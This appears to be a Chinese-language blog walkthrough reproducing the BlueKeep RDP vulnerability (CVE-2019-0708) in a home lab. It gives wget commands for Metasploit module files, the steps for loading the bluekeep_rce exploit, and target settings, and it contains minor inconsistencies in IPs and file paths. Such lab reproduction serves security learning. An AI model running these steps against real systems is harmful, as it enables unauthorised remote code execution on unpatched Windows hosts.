Windows遠程桌面服務漏洞(CVE-2019-0708)復現測試

2021-03-02 黑白之道


漏洞描述

2019年5月14日,微軟發布了針對遠程桌面服務的關鍵遠程執行代碼漏洞CVE-2019-0708的補丁,該漏洞影響某些舊版本的Windows。攻擊者一旦成功觸發該漏洞,便可以在目標系統上執行任意代碼,該漏洞的觸發無需任何用戶交互操作。這就意味著,存在漏洞的計算機只要聯網,無需任何操作,就可能遭遇黑客遠程攻擊,運行惡意代碼。其方式與2017年WannaCry惡意軟體的傳播方式類似。成功利用此漏洞的攻擊者可以在目標系統完成安裝應用程式,查看、更改或刪除數據,創建完全訪問權限的新帳戶等操作。

影響版本

該漏洞影響舊版本的Windows系統,包括:Windows 7、Windows Server 2008 R2、Windows Server 2008、Windows 2003、Windows XP。

Windows 8和Windows 10及之後版本不受此漏洞影響。

漏洞測試環境

攻擊機:kali   ip:192.168.0.129

靶機:win7     ip:192.168.0.133


kali:

下載攻擊套件

wget https://raw.githubusercontent.co ... core/exploit/rdp.rb
wget https://github.com/rapid7/metasp ... /rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasp ... 19_0708_bluekeep.rb

將下面的exp分別進行替換

/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

更新msf

apt-get update

apt-get install metasploit-framework

更新之後可能顯示要更新一個插件  更新了之後就可以正常使用了

打開虛擬機win7

開放3389埠

打開kali啟動msf

搜索0708,可以看到文件成功加載

使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce啟用0708RDP模塊攻擊

用show options進行參數設置

這裡只需要設置兩項,set rhosts 目標ip(我這裡是192.168.0.132,以及set target 3

set target ID數字(可選為0-4)設置受害機機器架構,wmware=3,Virtualbox=2成功利用。

有部分能成功拿到權限

到目前公開的利用代碼可用於攻擊 Windows 7 SP1 x64 與 Windows 2008 R2 x64的EXP不太穩定,針對 Windows 7 SP1 x64攻擊有藍屏現象。

相關焦點